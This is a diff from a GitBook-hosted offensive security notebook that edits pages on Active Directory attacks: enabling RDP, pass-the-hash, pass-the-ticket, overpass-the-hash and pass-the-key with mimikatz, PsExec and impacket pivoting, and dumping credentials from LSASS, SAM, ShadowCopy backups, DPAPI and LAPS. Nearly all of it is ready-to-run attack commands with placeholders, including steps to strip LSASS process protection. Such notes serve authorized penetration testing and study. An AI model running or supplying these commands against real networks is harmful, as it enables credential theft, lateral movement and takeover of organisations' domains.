GITBOOK-627: change request with no subject merged in GitBook

active-directory/enable-rdp.md

@@ -20,7 +20,7 @@ Configure firewall
 netsh firewall add portopening TCP 3389 "Remote Desktop"
 ```
 
-IF during connection the following error appears: "Account Restrictions are preventing this user from signing in." Enable restricted admin mode on the server
+If during connection the following error appears: "Account Restrictions are preventing this user from signing in." enable restricted admin mode on the server
 
 ```
 reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

windows-privesc/active-directory/lateral-movement/hashes.md

@@ -4,6 +4,10 @@
 
 Use the hash to login in another machine as a local user without knowing its password. Works because NTLM hashes are static so if a user logs into different machines his hash will remain the same on each host.
 
+* NTLM based
+* Requires the SMB port to be reachable on the target
+* The user/service must have admin rights on the target machine
+
 ```
 lsadump::sam 
 lsadump::lsa /inject /name:<user>
@@ -34,6 +38,10 @@ xfreerdp /u:Administrator /pth:<ntlm> /d:<domain> /v:<target>
 
 Loads a ticket in memory granting the current user access to the remote machine/service within the context of the current session.
 
+* Kerberos based
+* Alternative to PTH if NTLM authentication is disabled
+* Can be exploited even if the current user/service is not an admin on the target machine
+
 ```
 sekurlsa::tickets /export
 ```
@@ -42,7 +50,9 @@ sekurlsa::tickets /export
 
 ```
 kerberos::ptt <.krbi file>
-.\PsExec.exe -accepteula \\<target host> cmd
+
+.\PsExec.exe -accepteula \\<target host> <cmd>
+dir \\<host>\c$
 ```
 
 ### Run on Linux
@@ -58,18 +68,46 @@ python smbexec.py <domain>/<user>@<host> -k -no-pass
 python wmiexec.py <domain>/<user>@<host> -k -no-pass
 ```
 
-## Pass the Key
+## OverPass the Hash / Pass the Key
 
-Obtain a TGT ticket by providing a valid NTLM hash, AES key or password. The obtained TGT token can then be used to access other machines.
+Obtain a TGT ticket by providing a valid NTLM hash, AES keys, DES keys or password. The obtained TGT token can then be used to access other machines.
+
+* Kerberos Based
+* Alternative to PTH if NTLM authentication is disabled
+* Can be exploited starting from NTLM, secret keys or password (see [password to NTLM](../local-credentials.md#ntlm-from-password))
+* Can be exploited even if the current user/service is not an admin on the target machine
+* Requests a new TGT, as such the attack is not limited to the tickets stored in memory
 
 ### Run on Windows
 
+From AES/DES keys (Pass the Key)
+
 ```
 sekurlsa::ekeys
 
-sekurlsa::pth /user:<user> /domain:<domain> /rc4:<hash> /run:"<cmd>"
 sekurlsa::pth /user:<user> /domain:<domain> /aes128:<hash> /run:"<cmd>"
 sekurlsa::pth /user:<user> /domain:<domain> /aes256:<hash> /run:"<cmd>"
+sekurlsa::pth /user:<user> /domain:<domain> /des:<hash> /run:"<cmd>"
+```
+
+From NTLM (Overpass the hash)
+
+```
+lsadump::sam 
+lsadump::lsa /inject /name:<user>
+sekurlsa::logonpasswords
+
+sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:"<cmd>"      #from NTLM
+sekurlsa::pth /user:<user> /domain:<domain> /rc4:<NT hash> /run:"<cmd>"    #from NT
+```
+
+Pivoting
+
+```
+klist #verify the creation of ticket
+
+.\PsExec.exe -accepteula \\<target host> <cmd>
+dir \\<host>\c$
 ```
 
 ### Run on linux

windows-privesc/active-directory/local-credentials.md

@@ -25,7 +25,7 @@ if the logonpassword command returns an error `Handle on memory (0x00000005)` do
 !processprotect /process:lsass.exe /remove
 ```
 
-## NTLM From Password
+## Password To NTLM
 
 ```
 python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
@@ -58,7 +58,7 @@ Possible backups location
 
 #### ShadowCopy Exploit
 
-It is possible to retrieve and dump keys from old backup versions of the system saved with ShadowCopy. Once the backup version is exposed you can dump the SAM credentials and extract  DPAPI hashes. All the following operations require Admin privileges
+It is possible to retrieve and dump keys from old backup versions of the system saved with ShadowCopy. Once the backup version is exposed you can dump the SAM credentials and extract DPAPI hashes. All the following operations require Admin privileges
 
 Enumerate existing copies
 
@@ -157,7 +157,7 @@ Enumerate Credentials hashes. The parameter `guidMasterKey` reveals the hash of
 dpapi::cred /in:"<path to cred hash>" 
 ```
 
-Retrieve the master key, decode it and store the key in cache. In order to decrypt the key we need to be operating under the same context (user, system) the key belongs to.&#x20;
+Retrieve the master key, decode it and store the key in cache. In order to decrypt the key we need to be operating under the same context (user, system) the key belongs to.
 
 ```
 dpapi::masterkey /in:"<Path to MasterKeyGUID>" 
@@ -194,7 +194,7 @@ Get users of the detected group
 net groups "<group>"
 ```
 
-Run the following command in the context of a user part of the  group allowed to interact with LAPS to dump the stored passwords. The target is the machine with LAPS enabled
+Run the following command in the context of a user part of the group allowed to interact with LAPS to dump the stored passwords. The target is the machine with LAPS enabled
 
 ```
 Get-AdmPwdPassword -ComputerName <target>